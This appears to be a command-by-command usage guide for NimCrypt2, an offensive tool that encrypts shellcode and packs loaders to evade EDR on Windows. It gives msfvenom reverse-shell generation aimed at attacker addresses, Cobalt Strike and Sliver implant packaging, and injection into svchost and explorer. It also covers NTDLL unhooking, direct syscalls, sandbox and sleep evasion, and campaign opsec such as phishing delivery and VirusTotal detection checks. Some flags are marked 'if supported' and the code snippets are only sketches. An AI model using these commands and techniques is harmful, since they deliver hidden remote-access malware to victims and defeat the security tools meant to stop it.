NimCrypt2
NimCrypt2 is a post-exploitation framework written in Nim that encrypts shellcode and packs PE files with multiple evasion techniques including AES encryption, direct syscalls, NTDLL unhooking, and sandbox detection. It’s designed to bypass EDR solutions and deliver payloads undetected on Windows systems.
Installation
Prerequisites
Install Nim compiler and build tools:
# On Windows with Chocolatey
choco install nim mingw
# On macOS with Homebrew
brew install nim
# On Linux, use your package manager or download from nim-lang.org
apt-get install nim gcc mingw-w64Clone and Setup
# Clone the NimCrypt2 repository
git clone https://github.com/icyguider/NimCrypt2.git
cd NimCrypt2
# Install Nim dependencies via nimble
nimble install -d
# Build the tool
nim c -d:release src/NimCrypt2.nim
# Output: NimCrypt2.exe in current directoryBuilding from Source
# Debug build (faster compilation, larger binary)
nim c -d:debug src/NimCrypt2.nim
# Release build (optimized, smaller binary, slower to compile)
nim c -d:release --opt:size src/NimCrypt2.nim
# Cross-compile for x64 from x86 build
nim c -d:release --cpu:amd64 src/NimCrypt2.nimQuick Start
Basic Shellcode Encryption
# Encrypt shellcode and create loader executable
NimCrypt2.exe -f shellcode.bin -o output.exe
# With all evasion techniques enabled
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -u -s -sleep 5000Generating Shellcode Input
Create shellcode payloads from various frameworks:
# Metasploit Framework
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.bin
# CobaltStrike aggressor script output to file
# beacon> rportfwd [port] [ip] [port]
# Save beacon shellcode as SC.bin
# Sliver C2 (open-source Cobalt Strike alternative)
sliver > generate --mtls 192.168.1.100:8888 --save-to shellcode.binInput Options
| Option | Purpose | Example |
|---|---|---|
-f <file> | Path to raw shellcode file (required) | -f payload.bin |
-t <process> | Target process name for injection | -t svchost.exe |
-r | Enable remote thread injection | -r |
-m <addr> | Manual base address override | -m 0x140000000 |
Specifying Shellcode Input
# From Metasploit
NimCrypt2.exe -f meterpreter.bin -o loader.exe
# From CobaltStrike (stageless)
NimCrypt2.exe -f beacon.bin -o stager.exe -t explorer.exe
# From manual shellcode dump
NimCrypt2.exe -f custom_payload.bin -o custom.exeEncryption Options
AES Encryption
# Default AES-CTR encryption
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES
# AES with custom key (auto-generated if not specified)
# Key is embedded in compiled binary automatically
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -k 32XOR Encryption (Lighter Alternative)
# XOR encryption (faster, smaller file)
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR
# Multi-pass XOR
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR -k 4Key Generation and Management
# Nim code for custom key generation (advanced)
import nimcrypto
let key = newSeq[byte](32)
# Key automatically embedded during compilationExecution Methods
Local Process Injection
# Inject into current process
NimCrypt2.exe -f shellcode.bin -o output.exe
# Allocate memory, write shellcode, execute
# Uses NtAllocateVirtualMemory → NtWriteVirtualMemory → NtCreateThreadExRemote Process Injection
# Inject into remote process (e.g., explorer.exe)
NimCrypt2.exe -f shellcode.bin -o output.exe -t explorer.exe
# Inject with specific target by PID (if supported)
NimCrypt2.exe -f shellcode.bin -o output.exe -t 1234Remote Thread Creation
# Create remote thread in target process
NimCrypt2.exe -f shellcode.bin -o output.exe -t svchost.exe -r
# Execution flow:
# 1. Open target process handle
# 2. Allocate RWX memory remotely
# 3. Write encrypted shellcode
# 4. Decrypt in-memory
# 5. Create remote thread pointing to shellcodeHollow Process (PE Hollowing)
# Replace legitimate process image (if supported in build)
NimCrypt2.exe -f shellcode.bin -o output.exe -t notepad.exe -hollowDirect Syscalls
Native API Calls
NimCrypt2 uses direct syscall invocation to bypass EDR hooks:
# Core syscalls utilized by NimCrypt2:
# NtAllocateVirtualMemory - allocate executable memory
# NtWriteVirtualMemory - write shellcode to memory
# NtCreateThreadEx - create execution thread
# NtProtectVirtualMemory - change memory protection flags
# NtQueryVirtualMemory - query memory propertiesCustom Syscall Integration
# Compiled directly into binary with no IAT entries
# EDRs cannot hook what doesn't appear in import tables
# Syscalls dynamically resolved at runtime via SSN (Syscall Service Number)
# Survives NTDLL instrumentation and hooking attemptsAvoiding Import Address Table
# Generated executable contains NO standard Windows API imports
# GetProcAddress/LoadLibrary calls eliminated
# All syscalls embedded directly in compiled Nim codeUnhooking
Enable NTDLL Unhooking
# Replace hooked NTDLL with clean copy from disk
NimCrypt2.exe -f shellcode.bin -o output.exe -u
# Process:
# 1. Load NTDLL from disk into new section
# 2. Replace in-memory NTDLL with disk copy
# 3. Bypass EDR kernel callbacks
# 4. Execute via clean syscall stubsManual Unhooking Verification
# Check if NTDLL is hooked (in generated code)
proc isHooked(addr: pointer): bool =
# Examine first bytes of function
# Look for JMP/CALL instructions (indicators of hooks)
trueSandbox Evasion
Enable Sandbox Detection
# Activate all sandbox checks before execution
NimCrypt2.exe -f shellcode.bin -o output.exe -s
# Checks performed:
# - Domain join status (skip if workgroup)
# - Processor core count (fail if < 2)
# - Physical memory (fail if < 4GB)
# - Username anomalies (skip if "WDAGUtility" or "Guest")
# - Registry artifacts (Hyper-V, VMware, VirtualBox)
# - Disk size checks (fail if < 30GB)Individual Evasion Checks
# Domain check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-domain
# Memory check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-memory
# Username check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-userCustom Sandbox Detection
# Example check (pseudo-code)
if getProcessorCount() < 2:
quit() # Exit if less than 2 cores (likely VM)
if getTotalMemory() < 4 * 1024 * 1024 * 1024:
quit() # Exit if less than 4GB RAMSleep Obfuscation
Delayed Execution
# Sleep 5 seconds before executing shellcode
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 5000
# Measured in milliseconds
# 1000 = 1 second, 60000 = 1 minute
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 30000Purpose of Sleep Obfuscation
Defeats automated malware analysis by delaying execution:
# Sleep through detection window in sandbox
# 30-60 second delay bypasses typical 10-20s analysis timeout
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 60000 -u -sOutput Options
Executable Format
# Generate standalone EXE (default)
NimCrypt2.exe -f shellcode.bin -o payload.exe
# Generate DLL (if supported)
NimCrypt2.exe -f shellcode.bin -o payload.dll -format dll
# Generate reflective DLL
NimCrypt2.exe -f shellcode.bin -o payload.dll -format reflectiveOutput Customization
# Specify output directory
NimCrypt2.exe -f shellcode.bin -o C:\temp\loader.exe
# Output with custom entrypoint name
NimCrypt2.exe -f shellcode.bin -o output.exe -entry mainIntegration Examples
Metasploit Integration
# Generate Meterpreter shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o meter.bin
# Encrypt and pack with NimCrypt2
NimCrypt2.exe -f meter.bin -o agent.exe -e AES -u -s -sleep 5000
# Execute on target
# agent.exe → connects to 10.10.10.10:4444CobaltStrike Integration
# Export beacon from CobaltStrike as raw shellcode
# Artifact Kit → set format to "raw"
# Process with NimCrypt2
NimCrypt2.exe -f beacon.bin -o evasive_beacon.exe -e AES -u -t svchost.exe -r
# Deliver via initial access method
# Phishing → payload.exe → reverse shellSliver C2 Integration
# Generate Sliver implant
sliver > generate --mtls 192.168.1.100:8888
# Extract shellcode
# sliver > generate --save-to sliver.bin --format shellcode
# Package with NimCrypt2
NimCrypt2.exe -f sliver.bin -o sliver_loader.exe -e AES -u -sCobalt Strike BOF (Beacon Object File)
# Convert BOF to shellcode first
# BOF → shellcode conversion tool required
NimCrypt2.exe -f bof_payload.bin -o bof_loader.exe -r -t explorer.exeTroubleshooting
| Issue | Cause | Solution |
|---|---|---|
| ”Invalid shellcode file” | File doesn’t exist or wrong path | Verify file path and use absolute paths |
| Compilation errors | Nim not installed | Run choco install nim or use package manager |
| EDR still detecting | Evasion techniques inactive | Use -e AES -u -s -sleep 5000 flags together |
| ”Sandbox detected” | Running in VM | Test on bare-metal machine or disable -s flag |
| Output EXE won’t execute | Shellcode format incorrect | Verify shellcode with msfvenom -p windows/x64/shell_reverse_tcp |
| NTDLL unhooking fails | System DLL corrupted | Run on patched system or skip -u flag |
| Process injection timeout | Target process terminating | Use more stable target like svchost.exe |
Common Build Issues
# "nim: command not found"
# Solution: Add Nim to PATH or reinstall
# "error: undeclared identifier"
# Solution: Run 'nimble install -d' to fetch missing dependencies
# "compilation hangs"
# Solution: May be normal for release builds - wait 10-30 minutesBest Practices
Operational Security
- Always test payloads in isolated lab environment first
- Use different encryption keys for each campaign
- Rotate shellcode generators between operations
- Implement sleep obfuscation in all production payloads
- Combine NTDLL unhooking with direct syscalls for maximum evasion
- Never run generated payloads on your own machine
Payload Development
# Layer multiple evasion techniques
NimCrypt2.exe -f shellcode.bin -o final.exe \
-e AES \
-u \
-s \
-sleep 15000 \
-t svchost.exe \
-rDetection Avoidance
- Vary command-line arguments between campaigns
- Randomize sleep duration (avoid predictable patterns)
- Use process injection into legitimate Windows processes
- Implement junk code and string obfuscation at Nim level
- Monitor your tool’s detection rate on VirusTotal
Output Verification
# Verify shellcode format before packing
file shellcode.bin # Should be "data"
# Test on isolated VM with AV disabled first
# Then test with real EDR products installed
# Verify execution with Wireshark or netcat listener
nc -lvnp 4444 # Wait for reverse shell callbackRelated Tools
| Tool | Purpose | Comparison |
|---|---|---|
| ScareCrow | Shellcode loader with IAT/syscall obfuscation | Similar evasion, older maintenance |
| Freeze | Process image encryption and obfuscation | More obfuscation, less flexible injection |
| PEzor | PE packer with NTDLL unhooking | Bash-based, similar feature set |
| Donut | In-memory .NET assembly loader | For .NET payloads, different use case |
| shhhloader | Shellcode loader with advanced obfuscation | Newer project, similar goals |
| Themida/WinLicense | Commercial PE packer | Professional-grade, cost-prohibitive |
| ConfuserEx | .NET obfuscator | For managed code only |
When to Use Each Tool
- NimCrypt2: Flexible shellcode encryption with direct syscall support
- ScareCrow: Legacy campaigns, simpler requirements
- Freeze: Maximum obfuscation for long-running implants
- PEzor: Bash-compatible build pipelines
- Donut: When payload is .NET executable or PowerShell